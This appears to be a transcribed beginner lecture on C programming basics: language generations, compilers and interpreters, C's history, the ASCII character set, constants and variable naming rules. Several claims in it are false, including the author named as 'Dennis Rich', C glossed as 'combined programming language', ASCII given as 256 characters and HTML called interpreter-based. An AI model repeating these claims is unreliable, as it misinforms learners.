one more category of software called as application software, which is software understandable by the user instructions, that software is called as application software. What is the meaning of application softwares? Which are understandable by the user instructions, like English language, our understandable. Daily life, you are using different type of applications, like if I open any machine, either laptop or desktop, you are opening with different type of apps. Notepad is a which type of application? Desktop application. What is meant by desktop application? Which application can be run only on single machine? That application called as desktop application or standalone application. Which application can be executable only single machine? That application called as standalone or desktop application. Like if you are using with the Paint, that is also which category of application? Desktop application. MS Word, MS Excel. If you are using with the Gmail is a which type of application? Web application. It is web application. Every web application executed with multiple machines. If you want to open the Gmail application, compulsory which is required? Browser required. Through the browser only to open the application, that application called as web applications. Like which are the browsers are there? Google Chrome, Mozilla, Internet Explorer. If you want to open any web application, through browser only to open that application. Gmail, Facebook. What is one more category of application you have? Mobile based application. Mobile apps also use. Mobile applications like WhatsApp. WhatsApp is also one application. Through the mobiles, smartphones or tabs to be run. Finally, what is my conclusion? In the market, all softwares are developed different type of programming languages. All types of softwares developed based on different type of programming languages. In that programming languages, C is the basic programming language. Now see, what is meant by system software? Actually I discussed it's a machine understandable softwares. System softwares developed based on which programming language? System softwares are developed basically C, C++ programming languages. C, C++ programming languages, system softwares are developed. If you want to develop with application softwares, which are the programming languages in the market now? Application softwares how to develop based on which programming languages? .NET or Java. Java is a programming language. .NET also programming language. Finally, what is my conclusion now? Every system softwares are developed based on C language or C++. Every application softwares are developed based on advanced programming language. Now in the market, which are the advanced programming languages? Java programming language, .NET programming language. But actually, if you want to learn the Java programming language or if you want to learn the .NET programming language, must and should, which is the basic programming to be learned? C language. C is a basic language for all programming languages in the market. Now listen, before going to start the C programming language, now in the market, which are the programming languages available before C language? Before C programming language, which are the different type of programming languages available in the market? Now that you have to discuss now, generations of programming languages. Generations of programming languages you have. You see that
already what is meant by program? Program is nothing but a set of instructions or a set of statements is called as program. What is meant by language? It's a communication between the user and the machine with the help of programming languages. Now, before C language, I want to discuss some generations of programmings are there. Now, what is the first type of generation of programming language you have? Machine programming or machine level program. Under generation of programming languages, which is the first generation programming language? Machine language. What is meant by machine language? Which language complete program you have to write into machine codes. What is the meaning of machine language? The program completely you have to write into binary instructions. What are the binary instructions? Zeros and ones. If I want to work with machine language, compulsory which to be understand? Binary numbers. What is meant by machine level programming languages? These programming languages, these programmings to write machine codes, completely machine codes like 0, 1. Now, this programming language is completely machine understandable language. It is not a user understand, it's completely machine understandable language. It's completely machine understandable language, not for user understandable. And what is one more type of programming language you have? One more generation of programming you have? Mid-level programming language. What is meant by mid-level programming language? Now, in this programming language, you can write the machine codes plus English language also. Machine plus English. Now, this is also called as assembly language programming. It's called as assembly language programming. Like see, if you go for machine language program, if you work with machine language program, I want to add the two numbers 10 plus 5. I want to add the two numbers 10 plus 5. Actually 10 is our understandable number, 5 is our understandable number. But when you go for machine language, the 10 first to convert to the binary, then only you can run the program, you can write the program. What is the 10 binary number? 1010. After that 5 also binary number you have to write, 5 also binary number 101. That means what? If I want to work with machine language, compulsory your instruction should be maintained to the ones and zeros. If you know the ones and zeros, then only you can run, otherwise you can't run off these. It's very difficult to understand. It's completely machine understand. There is no English here. What is meant by mid-level? It's a assembly language. What is meant by assembly language? It's a mixed code of assembly language called as mixed code of machine language plus machine also there plus English. 50% machine code, 50% English code. The both can be right. This is called as assembly language. Compared to machine level, which level is understandable? Mid level. Some more understand. Now, this language called as assembly language, it is also machine understandable. It is not complete user understand, it is not complete machine understand. It's a 50-50, 50% machine, 50% user. When you go for mid-level language, assembly language, if I want to add the 10 plus 5, add is a mnemonic word, you have, it's a English. After that 1010, it's a binary number, 101, it's a binary number. What is the meaning of that? Add is English, 1010101, it's a binary. The mixed code of instructions will be typed with the help of mid-level or assembly language. What is the third generation of programming language you have? High-level programming. High level.
What is mean by machine level? Completely low level. It's completely low level. What is mean by middle level? It's 50% machine, 50% user. What is mean by high level language? Is completely user understandable language. Which language is completely user understandable language? High level language. Now this language to write the code in English language. Directly you can write the code English language. Now it's a completely high level language. Which are the high level languages in the market? Currently you are learning C language. C is a high level language. C++ also high level language. Java also high level language. .NET also high level programming. Now in the market 125 plus programming languages are there. It's a high level languages. 125 plus programming languages. These all are high level languages. Finally, what is my conclusion? C is a high level programming language. Which are the generations of programming you have? First one is machine level. It's called as low level program. Second one is mid level. It's called as assembly language program. Third level or third generation called as high level program. The complete program you have to write into English. Now this is completely user understandable. This language completely user understandable. User followed that. This language understandable by the user code. Understandable by user code. By the user code that you can understand. Now see, these all generations of programming languages, which language to use the compilers? High level language. Under high level language you have to use one translator. It's called as compiler to be used. Compiler. What is mean by compiler? It's one of the translator. You can convert your program code into machine language. Again that is converted into our understandable language. What is the definition of compiler? You write the program in English, but that is converted to the machine language. Again that is converted to the our understandable language. This work done by which processor? Compiler. Compiler can be done. These compilers are introduced only high level language. High level languages only introduced to the compiler. Now see, which is mean by translator? Which is mean by translator? You have translator. Compiler is used to convert your complete program into machine language at once, but translator is nothing but you can convert to the machine language line by line or step by step. Line by line or step by step you want to use. Now you see, what is the type of translators you have? You have the compiler also one type of translator, and interpreter also one type of translator. Compiler also one type of translator, interpreter also one type of translator. What is the difference of compiler and interpreter? Compiler, all lines of code at a time convert to the machine language. It's a program wise. But interpreter, it is converted to the machine language step by step. It is completely step by step convert to the machine language, but this is complete all lines at a time convert to the machine language. But anyway both are called as what? Translators. You want to convert source code into machine code, again that is translated to our target code. This is the work of translators. Now in the market, which are the compiler based languages? C, C++, and COBOL, Pascal. These are the compiler based languages. Many languages you have compiler based. Which are the interpreter based languages? HTML, hypertext markup language, CSS cascade style sheet, and JavaScript. JavaScript also interpreter based language. Now in the market, some languages are compiler based, some languages are interpreter based. Which are the compiler based languages? C language, C++, COBOL, Pascal, Ada. Which are the interpreter based languages? HTML,
CSS, JavaScript. These are the interpreter based languages. Now you see, whenever you are working with a C programming language, you have to idea about some basic definitions, like what is meant by program. Before going to start the C program, what is meant by program? A set of instructions, a set of instructions is called as program. What type of instructions you can run? Input instructions, output instructions. Every program consists with a set of instructions, input instructions, output instructions. What is meant by input instructions? Which instructions are inputting through the input device like keyboard. What is meant by output instruction? After processing, you are inputting some value, after processing you are expected some output, that is called as output instruction. Which is the output instruction to be run? Output device. Input instructions are inputting through the keyboard, output instructions are receiving through the monitor, that is called as output device. Now see, every program set of instructions can be maintained. What is meant by software? Software called as set of programs. See that, what is meant by software? Set of programs called as software, set of programs, that is called as software. Program is nothing but set of instructions. Now finally, in C language, what to be developed? Programs. In the C language to be developed the programs. Now for the program consists with the input instructions and the output instructions. But listen, generally if you are learning the C programming language, whenever you write the C programming language, what type of softwares can be developed? Which type of softwares can be developed? System software can be developed. What is the meaning of that? Which softwares are understandable by machine? That softwares are system softwares. That means using C language program, which type of softwares can be developed? System softwares can be developed. Which are the system softwares? Example, check it. DOS, Unix, Windows, Linux, Mac. Now in the market, Unix operating system originally developed based on the C language. Unix operating system actually developed C programming code. And now in the market, some applications also there, database applications like Oracle. Oracle also developed based on the C programming code. And one more is driver programs also developed based on the C programming code. Finally, what is my conclusion now? Using C language, what type of software can be developed? System software. What are the example of that? Operating systems can be developed. Now you see, using C language, which operating system is developed? Unix operating system is developed. Unix software developed based on the C language. Using C language code only Unix software developed. Now see, before going to start for the C language, what is the history about the C language? History about C programming language. Actually C is a programming. Before C programming, what are the programming languages available? Before C, history of programming languages. Now in the 1960s, one program is introduced. In 1960s, one programming is introduced. Which programming is introduced? BCPL. BCPL programming is introduced. What is meant by BCPL? Basic Combined Programming Language. In 1960s, BCPL programming language is introduced. Who is the author of BCPL program? Martin Richards. Martin Richards, he is one of the American. Martin Richards started the BCPL programming language. It is also high level. Martin Richards started the basic combined programming language, where it is developed in at AT&T company will be there. AT&T company.
that is nothing but American Telegraph and Telecommunications, AT&T company. Then you see AT&T company, you have AT&T company, American Telegraph Telecommunications. At that AT&T company, Bell Laboratory is there in US. In US, Bell Laboratory, AT&T company, which is developed BCPL programming language developed. This programming developed by Martin Richards. He is the author of the BCPL language. And see that after 1960, one more language is also came in the market. One more language is also came in the market. That is on 1966. 1966, one more programming language is started. That programming is called as 1966 B programming. B language programming started. B language. Before that B language, which language is very famous language? BCPL, Basic Combined Programming Language. But that name is changed by B language. Some features are added. Some features are added to the BCPL, to the B language. Who is the author of that B language? Ken Thompson. Ken Thompson started the B programming language. Where it is started, again same, AT&T company, American Telegraph Telecommunications, AT&T company, and Bell Laboratory, AT&T company, Bell Laboratory. In US only started the B programming language. Now coming to the C language history, actually C language started in 1972, which is the year of C programming language introduced here. What is the name? 1972 started the C programming language. 1972, who is the author of C programming language? Dennis Rich. He is one of the American. Dennis Rich. Dennis Rich started the C programming language in 1972. Where it is started, again same, AT&T company, Bell Laboratories, C programming language is introduced. 1972, Dennis Rich, AT&T company, Bell Laboratory, C language program is introduced. C language program. Finally, what is my conclusion? C language before, which is the very famous language? BCPL language. C language before BCPL language is very famous. After BCPL, which languages came in the market now? B languages came in the market. After that B language, which languages came in the market? C language. Advanced of C, one more language is coming in the market after C. C++ programming language. After C, C++. After C++, which is the advanced programming of nowadays, Java programming language. Now these are the various different type of programming languages now in the market. The first it is used BCPL programming languages used. After that B language programs are used. After that C language programs are used. C language advanced is C++ programming. C++ advanced is Java programming. Now see, what is the abbreviation of C? Actually C language, C programming language. How to abbreviate the C? C called as what? Combined programming language. C is nothing but combined programming language. Under C programming, which programming features are combined? A language, before B A language also there, before B A language. What is meant by A language? Assembly language. Assembly language programming plus B language. What is meant by B language? It's a basic programming language, basic combined programming language. Finally, what is my conclusion? C abbreviation called as combined programming language. Before C, which languages are there? A language and B language. Both programming features added into the C language. That is for C language.
And one more is you can abbreviate like C. C is compiler based language. Compiler based language. C is a compiler based. It's a compiler based. What is meant by compiler? Compiler called as, it's one type of translator, what I discussed. All programming lines convert to the machine language. Again, that is converted to the our understandable language. This work is done by which processor? Compiler. Compiler will be done. And you see that in the market, which are the famous compilers are there, compiler examples are there. You see some compilers, Turbo C, TC compiler, TC called as Turbo C compiler, and TC++, Turbo C++, Turbo C++, it's also one compiler, ANSI C, it is also compiler, Div C, it is also compiler, Bornold C, it is also compiler. Different type of compilers introduced to different companies. These all are many compilers. Now these all compilers you can run with the C language programs. Suppose in your machine you want to work the C language program, which is the software to be installed? Compiler to be installed. All these compiler, any one to be installed, then only you can run the programs. Now see, while working of C programming language, you see that C programming language you have, generally if I want to understand English programming language, English is nothing but it's a communication between user and user. Suppose if I want to communicate machine with the help of C programming language. If any language you don't know that, how to learn further languages? Suppose you don't know the English, or if you don't know the Hindi, or if you don't know that other languages, how to learn for that languages? First you have to start with the alphabets. First you have to start for learning alphabets. Suppose if you want to learn the English, suppose English language, how to start for learning? You have to start with the, which is the English language character set. Which is the English language character set? A to Z. A to Z to be understand, alphabets. After learning of that, what to be understand? Once you are learning the English language basic character set, what is the next step to be follow? What to be understand? Making of words. Making of words. Whenever you learn the A to Z alphabets, then what is the next step to be move on? Words learning. What is meant by word? Word is nothing but a set of characters, a group of characters. It's called as words. Once you are learn the words, after learning of words, what is the next step to be move on? Sentence creations. Sentence creations. Whenever you perfect of words making, then you move on to the sentence learning. What is meant by sentence? A group of words is called as sentence. Every sentence terminated by dot. Every sentence terminated by dot. Whenever you are learn the sentences, what is the next to be move on? Whenever you learn the sentences creations, what is the finally to learn? Paragraph creations. Finally to learn paragraph. What is meant by paragraph? Paragraph called as what? A collection of sentences. What is meant by sentence? A collection of words. What is meant by word? A collection of characters. That means what? If you want to understand any language, first you have to know about some basic characters. If you want to understand for the English, this is called as character set. Once you are learn the character set perfectly, you have to go for words creation. What is meant by word? A set of characters. It's called as what? Whenever you perfect the words, then what to be learned? Sentence. What is meant by sentence? A set of words or a group of words. But every sentence terminated by full stop. Whenever you perfect in the sentences creation also, you can write the paragraphs. Your own, you can write the paragraph. You can make a story also.
a set of sentences called as paragraph. Similar way, coming to the C programming language, C also you can learn different steps are there. Whenever you want to learn for English, these are the steps to be followed. Similarly, if you want to understand C programming language, you have to go for some steps. But what is the difference of C language and English language? C is also language, English also language. But what is the difference of C and English? English is nothing but user to user communication, people to people communication. But C language is communication between the user and the machine understand. Not only C language, C++, Java, .NET, you want to communicate the machine, because machine does not understand your language, to communicate that with the help of programming languages. English is language to communicate the people, C is the language to communicate the machine, programming language. If you want to understand the C language program, you have the steps. What is the step number 1? When you go for English language, what to be understand? Just alphabets, A to Z. In English language, how many alphabets? 26, A to Z to be understand. But when you go for C programming language, A to Z, after that capital A to Z, you want to work with the capital letters also here. Capital letter to be start, capital letters, and small a to z, after that capital A to Z, and one more is 0 to 9 digits, and one more is symbols, some symbols like special symbols you have. In the keyboard you have some different type of symbols, special symbols. That means what? If you want to understand the C programming language, these are the characters to be followed for the C programming language. Lowercase letters A to Z, uppercase letters capital A to Z, 0 to 9 digits and symbols. This is completely called as what? C language ASCII characters. It's called as, the name is ASCII characters name. What is meant by ASCII? American Standard Code Information Interchange. American Standard Code Information Interchange. It's completely ASCII values. In English language only for alphabets, but for the C language, totally small letters, capital letters, digits and symbols. How many ASCII values in the C language? 256 characters. 256 characters. I mean small a to z 30, small a to z and capital A to Z and 0 to 9 and remaining symbol, all are. This is completely 256 characters. This character set called as ASCII character set. That should be understood. What is meant by ASCII characters here actually? If you are entering with small letters, American character, some code will be there. Code. What is the code of that small letters? 97 to 122. It's a coding of small letters. 97 to 122. If I enter the small a, 97. If I enter the small z, 122. Whenever you are enter the capital letters, which is the code 65 to 90. That means uppercase ASCII values are 65 to 90. Lowercase ASCII values are 97 to 122. 0 to 9 also ASCII values, 48 to 57. Remaining all are the symbols, totally 256. This is the basic character set of C language. Now this character set not only for C language, if you learn for the Java, C++, .NET, COBOL, every programming this character set to be followed. 256 characters, this is compulsory to follow American Standard Code Information Interchange. Once you are learning of this ASCII characters, what is the next step to be move on? Keywords learning. What is mean by keywords?
which words are already defined by C language author. C language author defined some meanings. Those meanings are called as keywords. How many keywords defined by C language author? 32 words. It's a predefined. It's a predefined like int, integer, char, character. Some meanings already defined. Done is which already defined. Some meanings. Those words are called as keywords or reserved words. Once you have learned the keywords or reserved words, what to be next to be move on? Variables. Keywords are nothing but author defined, variables are nothing but user defined. These are the user defined words. Keywords are author defined words, but variables are user defined words. If I want to store any value, if I want to manipulate any value, variables to be used, our own defined. What is one more to be understand? Constants. I mean, which value you want to fix the value, you don't want to change. It's a constants. Suppose if I want to calculate the pi area of the circle, pi r square. What is the pi value? 3.14. It's fixed value. I don't want to change of that value. That type of values can be enter constants. That is called as constants. Whenever you understand these keywords making, variables making, constants making, what is the next step to be follow? Statements. Statements to be follow. Statements creation. What is mean by statements? A set of keywords, a set of variables, or a set of constants. You want to define as one line. The line is called as statement. A set of words or a set of variables or a set of constants, you make a line. The line called as statement. Every C language statement terminate with a semicolon symbol. Every C language statement, every line ends with semicolon. In English language means every sentence ended by full stop, but C language means every statement ended with a semicolon. Semicolon to be used. Finally, what to be developed once you learn of these? Programs to be developed. Finally, to develop the programs. What is meant by program? A set of statements. A set of statements is called as program. A set of statements is called as program. Now you see, this is the way of learning. Whenever you want to learn the C programming language, these are the steps are involved. First you have to start for learning ASCII characters, which are the characters used in C language. After that, to learn the keywords, I mean which words are already defined, author defined, which are the variables, I mean our defined words which can store the values. Constants. Constants means which are the fixed values, you don't want to change of that values. Once you are learning of these all things, then go for moving on statements. How to make a statement, a set of keywords, variables, constants, you make a line, the line called as statement. Every statement ended by semicolon. What is meant by program? A set of statements. Finally, that is for a way of learning C programming language. Finally, what is my discussion about that this C programming language? Whenever you learn the C programming language, what type of softwares can be developed? System softwares can be developed. Now in the market, which are the system softwares are there? Unix operating system, Linux, DOS, Windows. Unix operating system basically developed from C programming language. Application software means our understandable softwares. Those are developed based on the Java, .NET and advanced programming languages. But C is used only to develop the system applications, console applications. Get it or not? That is for system application software to be developed. Okay. Then tomorrow class I can continue the basics of C language structure. Structure I continue. The tomorrow session I will continue.
This is C language program. The last class I discussed what is the need of C programming language, why you have to use the C programming language, what is the history about the C programming language, which kind of softwares can be developed based on the programming languages. Actually, C is a high level programming language and C is a advanced programming language. Using C language, which type of softwares can be developed? System softwares can be developed. Now in the market, which are the system softwares are there? DOS, Windows, Unix, Linux. Using C language, Unix software already developed based on the C language. Now for the what is the history about the C language? In 1972, AT&T company, American Telegraph Telecommunications, Bell Laboratories, C language developed by Dennis Rich. Before C language, which are the famous programming languages? First programming language is BCPL, Basic Combined Programming Language. That language developed by Martin Richards. That language changed it to the another language program name, that is called as B language, developed by Ken Thompson. Later B language changed to the C programming language, developed by Dennis Rich, AT&T company, Bell Laboratories in the year of 1972. Now in the market, all programming languages, which is the basic programming language to be followed? C programming language. Now which are the advanced programming nowadays? Java, .NET, PHP, these all programming languages. Basic language is C language is required. Without C language, you can't understand Java, .NET or PHP, all other programming languages. Now see, the last session I discussed the basics about C language. That means how to learn the C programming language. How to learn the C programming language? Suppose if we want to learn the English language, which are the basics are there? First we start with alphabets. If you want to understand the English language, first we start with alphabets learning. After learning of alphabets, words creation. After learning of words, sentences creation. After making of sentences, paragraph creations. This is the same way you can work with C programming language also. Steps will be there. How to develop the C programming language, you have some steps. Generally English language, which is the basic character set A to Z, 26 alphabets. If you want to work with the C programming language, which is the basic character set of C programming language, ASCII characters are there. That is called as American Standard Code Information Interchange. In English language, A to Z, 26 alphabets. If you want to understand the C programming language, 256 characters to be learned. Those characters are called as American Standard Characters. Under American Standard Characters, which are the characters used? Uppercase letters, lowercase letters, symbols and digits. Finally, what is my conclusion? C programming language, which is the basic character set to be follow? Alphabets, numbers and symbols. This is called as ASCII character set. Whenever you learn the ASCII character set, what is the next step to be move on? How to work with the keywords. What is meant by keywords? Which words are already developed by C language or there? Those words are called as keywords. Suppose when you go for C programming, int means integer, it's already developed by other. Char means character, float means decimal, double means long float. Like that you have many keywords are there in C programming language. How to define the keywords? Which words are already defined by C author? Those words are called as keywords.
Now in the C programming dictionary, how many keywords are there? 32 keywords. 3 to 32 keywords. Once you learn the keywords, what is the next step to be move on? Variable creations. Keywords are author defined. What is meant by variable? Which words are already defined by author? Keywords. Which words are defined by user? That are called as variables. Variables are nothing but which user define, which can store the value, which can manipulate the value, that is called as variables. Whenever you learn the variables, what is the next step to be move on? Constants. How to define the constants? What is meant by constant? Which value cannot changeable, that values are called as constants. Which value can changeable, that are called as variables. Variable value can changes, but the constant value cannot be changes. Suppose in your program you want to change the values, variable can be used. In your program you don't want to change the values, constants, fixed values. Suppose I want to calculate the area of circle. What is the formula for area of circle? Pi r square. What is the pi value? 3.14. That is fixed value. You can't change of that pi value. Radius value can be changed. Pi value cannot be changed. Those values are called as constants. Which value cannot changeable, that is called as constants. Once you learn the keywords, variables and constants, what is the next step to be move on? Statement creations. What is meant by statement? A set of keywords, a set of variables, a set of constants. You make a line, the line called as statement. Every C programming statement ended by semicolon. It is terminated by semicolon. In English language, every sentence terminated by full stop, but C language, every statement ends with a semicolon. Different type of statements, maybe variable declarations, or maybe expressions, or maybe initializations, or maybe input statements or output statements. A statement is consists of variables, keywords, constants or expressions. Every statement ended by semicolon. Whenever you learn the statements, what is the next step to be move on? It's a final step, program creations. What is meant by program? A set of statements or a set of instructions is called as program. Every C language what to be developed? Programs to be developed. The programs are defined based on the statements. The statements are defined based on the keywords, variables and constants. Now the keywords, variables, constants, which is the basic character set, ASCII character set, American Standard Code Information Interchange, totally 256 characters. Now these are the basics. You can work under C++ also. You can work under Java, you can work under .NET also. The same character set you can work under Java also, .NET also, PHP also, other programming also. It's a basic character set. Now you see that when you see the what are the steps to be move on for the C language, you see that steps alphabets, digits, special characters. Whenever you create that alphabets, digits and special characters, you learn keywords, variables and constants. Then after that you have to make a instruction or statements, finally to develop the programs. Now you see which is the C language character set. Which is the C language character set you have? C is a case sensitive programming. What is meant by case sensitive programming? Case sensitive called as, if you are use the small letters, that you have to use only the small case letters. If you are use the capital letters, everywhere the capital letters only use. You can't convert upper to lower and lower to upper. What is the mean that? Suppose your variable is small letter,
that variable everywhere to use the small letters. If you are using the capital letters, that variable can be used everywhere, capital letters. You can't convert upper to lower, lower to upper. C language is a case sensitive programming. Nowadays all professional programming languages are case sensitive. Java also case sensitive, C++ also case sensitive, .NET also case sensitive. But when you go for HTML, it's not a case sensitive language. Any case can be learned, either lower case or upper case. But the professional languages are followed by case sensitive. Because of security reason you have to use. Now you see, C is a case sensitive programming language. That means there is a difference between the small and capital letters. You see that when you go for ASCII values, uppercase A 65 is the starting of ASCII value. Small a, which is the ASCII value, 97. But these are not our defined, it's already predefined. Actually, you enter with a, it is understand the 65, but internally machine convert to the binary number. 65 converted to the binary internally. If I enter the small a, 97, 97 also internally convert to the binary number, ones and zeros. You see that what are the uppercase letter ASCII values? Capital A to capital Z, 65 to 90. And what to be remember? Every C programming compulsory this 65 to 90 to be understand. Uppercase letter ASCII value should be remember. In the future programming also compulsory capital A for 65, capital Z for 90 to be follow. Compulsory to remember this. Not only C language, C++, Java, .NET also, because it's a ASCII values. Like when you go for small letters, small a to small z, 97 to 122. Small a ASCII value 97. If I enter the 97, it is converted to the zeros and ones, binary numbers. 97 to 122, 26. 65 to 90, 26. Digits also ASCII values. Suppose if I enter the 0, our entered the 0, but it is internally convert to the ASCII 48. The 48 convert to the binary. If I enter the 9, our entering number 9, but the digit convert to the 57, that is convert to the ASCII binary numbers. That is called as fixed ASCII values. Finally, what is my conclusion? Uppercase letter ASCII value 65 to 90, that should be remember. Lowercase ASCII value 97 to 122, that should be remember. And 48 to 57, that is called as 0 to 9, digits ASCII value. The remaining all are special symbols like hash, dollar, @ cap, star, but these symbols no need to remember, that is also available. Finally, total ASCII values 256 ASCII values, 256 characters. That is called as C language character set to be understood. Now you see, once you learn of the C language character set, what is the next step to be move on? You see that constants. Constants to be developed. What is mean by constant? Constant called as what? Which value cannot changeable. Suppose I am defining pi. Pi is a variable I define. Inside of the pi, I enter the 3.14. It's a fixed value. Suppose if I want to enter the integer means you can enter only for plain numbers. That is also you want to fix that. Which values cannot changeable while designing of the time, that is called as constants. Which value can changeable, that are called as variables. That is our requirement based on the program requirement to use. If I want to calculate the area of circle, pi value should make it as constants. Radius value should make it as variables. You can enter the any radius. Now you see the constants are generally two types of constants you have. Character constants are there. What is mean by character constants? Whenever you are entering with the single letters within the quotation, that is called as characters. What is mean by character constants? Which value enter within the single quotation, it treated as characters. Maybe alphabets you can enter, maybe digit also you can enter,
maybe symbol also you can enter, or maybe special symbol also enter. What does that mean? That character means any letter, only the single quotes, single letter only allowed, not for multiple letters. When you move on the strings, what is meant by string? Multiple characters. You can store multiple characters. Character is nothing but single character, string is nothing but group of characters. It's called as string. Like you see double quotes, every string value should be double quotes, A, B, C. It's a string. 435. Actually 435 as a number, but if I put in the quotation, it treated as string. Without quotation, it treated as number. Within the quotation, it treated as string. If I enter the R-A-M-A, Rama, it's a name, it's a string, group of characters. String consists with the alphabets also, string consists with the digits also, string consists with symbols also. Like email ID consists with @ symbol, that is also you can treat it as strings. These two categories are character constant categories. Character constant category means character means single letter, string means group of letters. Anything can be entered which is fixed values. The next category, numeric constants you have. What is meant by numeric constants? Whenever you want to enter the numbers, then go for numeric constants. If I want to enter the numbers, numeric constants. Under C language, which are the numeric constants? Integers. What is meant by integers? You can enter only for plain numbers. Integer value, don't put the quotations, direct number, no quotation, no double quotes, direct number, plain number, there is no decimals. The integer allowed negative value also, integer allowed positive value also. Signed integer. What is meant by signed integer? Negative value can enter. Unsigned integer means only positive value can enter. Now this is number, something any number, this is negative, it's a signed, negative sign indicates signed. If there is no sign, it's called as unsigned. Real number constants you have. What is meant by real number constants? If I want to go for decimal points, number with decimals. Number with decimal points. You see that fraction forms, fractions, 435.67, 2 decimals you have. 345.3054, you have the 5 decimals. Decimal points, maybe 2 points, maybe 6 points, based on our type. Exponential forms. What is meant by exponential forms? E power values. 0.02, expansion of 3, 1.17, expansion of -38, E means exponent value. It is called as a fraction, exponent value will be that. E for exponent, 10 to the power of value, 10 to the power of values in mathematics. Now these all are called as constants. Finally, what is my conclusion? Constants can be make it as numbers also, constants can be make it as characters also. Under character constants, 2 types, single character constants, multiple character constants. Multiple character constants called as strings. Under number constants, 2 types are there, integer constants and fractional forms, I mean decimal constants. Exponential forms also allowed. These are called as constants to be understand, how to work off that constants. Now when you go for what is the next step to be move on? You see that what is the next step to be move on? Variable creations. Next step are variables. You see that what is meant by variable? Variable called as which is user defined word, which can store the value and which can variate the value, which can change the value, that is called as variable. What is the mean that? Variable is nothing but our defined word. Keywords are nothing but other defined. Suppose if I use int is a keyword, you can't define. Char is a keyword, you can't define. Float is a keyword. Variable means our defined any word, maybe your name,
or maybe your marks, or maybe your phone number, that is called as variables. Variable value can changes. Now see, what is the definition of variable? Actually you can take the quantities which can be changed, which value can be changed during the execution of program called as variables. Which value cannot change, that is defined as constants. Which value can be changed, execution of program called as variables. A variable can be considered as name of the cell. Name of the cell, I mean memory, where you store in the memory, that cell called as variable. In that memory you can hold the value. You can hold the value, any value can be held. To use any variable, it must be declared. If I want to use any variable, it must be declared with its data type. What is the meaning of that? Suppose if I want to use with marks, if I want to use a marks, suppose marks is a variable. I want to enter the student's marks. Actually, student marks are which type of data? Student marks are numbers. Numbers means C language, which is the data type to define int. Int means you can enter the numbers. Suppose I want to define grade of the student, A grade, B grade, C grade. At that time, which type of variable can be created? Character variable. Character variable means you can store the characters. Suppose if I want to store the attendance, student attendance, 45.6 attendance or 79.6 attendance, which is the data type to be defined? Float data type. That means what? Every variable proceeded with the data type. If I want to define the variable, before use of that variable, must and should defined as data type to be defined. You see that whenever you are declaring any variable, first it's followed by data type before first executable statement, and then can be initialized. What is meant by initialized? If I want to assign any value, that is called as initialization. Once the variable you are enter any value, that is called as initialization. Before initialization, compulsory the variable to be declared. The variable should be data type to be proceed. That is called as variable to be discussed now. Finally, what is my conclusion of variables? It's called as user defined words. You can store the value based on the data types. If it is integer variable, you can store integers. If it is character variable, you can store characters. If it is string variable, you can store the strings. If it is float variable, you can store the decimals. Based on your type only, you can store the values. Variable is also called as memory container. If I want to store the value, compulsory memory container is there. That means what? If I used the integer, I want to store an integer value, memory should be created. Compiler allocated some memory, that memory cell name called as variable. Wherever holding the value, that memory cell called as variable. Now see, what is the next step of the C language program? If I want to move that next step, if I want to define the variable, you want to follow some rules for variables. If I want to create the variable, some rules are there, rules for the variables. You see the rule number 1, the variable name must starts with either alphabets or underscore, or may contain alphabets, digits. What is the meaning of this rule? Every variable must started with alphabet or underscore, or may contain the alphabets and digits. What is the mean that? Suppose if I defined any variable, the variable first letter should be starts with the alphabet. What is the rule number 1? Every variable first letter starts with alphabet or underscore. Remaining letters may be alphabets or digits, but the first letter should be alphabet or underscore. Remaining letters anything. That is the rule of the variable rule.
see that what is one more rule you have, the minimum length of variable is 1 character, maximum there is no limit of this, actually there is no limit, but recommended length is up to how many characters? 31 characters. 31 characters. What is the mean that actually variable name minimum 1 character should be there, maximum there is no limit actually, but mostly compilers recommended 31 characters. Mostly all compilers, C language all compilers recommended 31 characters. More than 31 also you can enter, it is not shown any error. What is one more rule you have? Whenever you create the variable, that must not be any blank space or special symbols in the variable name. Every variable name between there is no blank spaces, there is no special symbols in the variable name. What is the meaning of that? If you are defining a variable, in between you do not use for any spaces and there is no special symbols, but underscore is allowed. Except of underscore, remaining symbols not allowed in between the variables. Which are the special symbols? Like space, dot, hash, but which is allowed? Underscore is allowed. Now see, every variable name must not be a keywords. The variable should not be taken as keywords. The variable names should be our defined, user defined, any word, but do not take it as keywords. What is meant by keywords? Other defined words are called as keywords. Keywords as a variables you can't define because it is already predefined. What is one more rule? Every variable name must be unique name. What is meant by unique name? There is no duplicate variable names in the single declaration. That means what? If I declare int x, x is a variable, int is a data type, just once you declare. Again same statement, you can't declare the same variable. In another declaration you can allow. In the same declaration the variable name should be unique, no duplicates. What is one more rule? Every variable names are case sensitive. What is the meaning of variable names are case sensitive? Suppose my variable is small x I created, entire program the small x only to use. Suppose if I create the variable uppercase x, entire program you can use uppercase x only. You can't change small to capital, capital to small. The variables are case sensitive. Finally, C program everywhere case sensitive. Function also case sensitive, keyword also case sensitive, variable also case sensitive. You have to follow that rules only to follow to make a program. Now see, these are the majorly 6 rules you have. What is the rule number 1? Once I repeat that, every variable name start with either alphabet or underscore. Remaining may be contain alphabets or digits. Every variable name minimum length 1 character should be there, but maximum there is no limit. It recommended up to 31 characters. It is recommended, but it is not compulsory. More than 31 also you can exceed. Every variable name in between don't take the blank spaces or special symbols. You can't use the space, you can't use the special symbol like dot, hash, but you can define the underscore. Underscore is allowed. Every variable name must not be a keywords. Actually keywords are author defined. Author defines you can't change as a variables. Every variable name must be unique name. What is meant by unique name? There is no duplicate variables. Same variable 2 times cannot be declared. Single declaration it is not allowed. Variable names, the last one, variable names are case sensitive. If I defined as lowercase, lower only to follow. If I defined as uppercase, uppercase only follow. These are the rules to be followed to making of variables. See that what are the rules? Rule number 1, every variable starts with alphabet or underscore. Rule number 2, minimum 1 character, maximum there is no limiter, but recommended C compiler 31 characters. Rule number 3, in between special symbols not allowed.
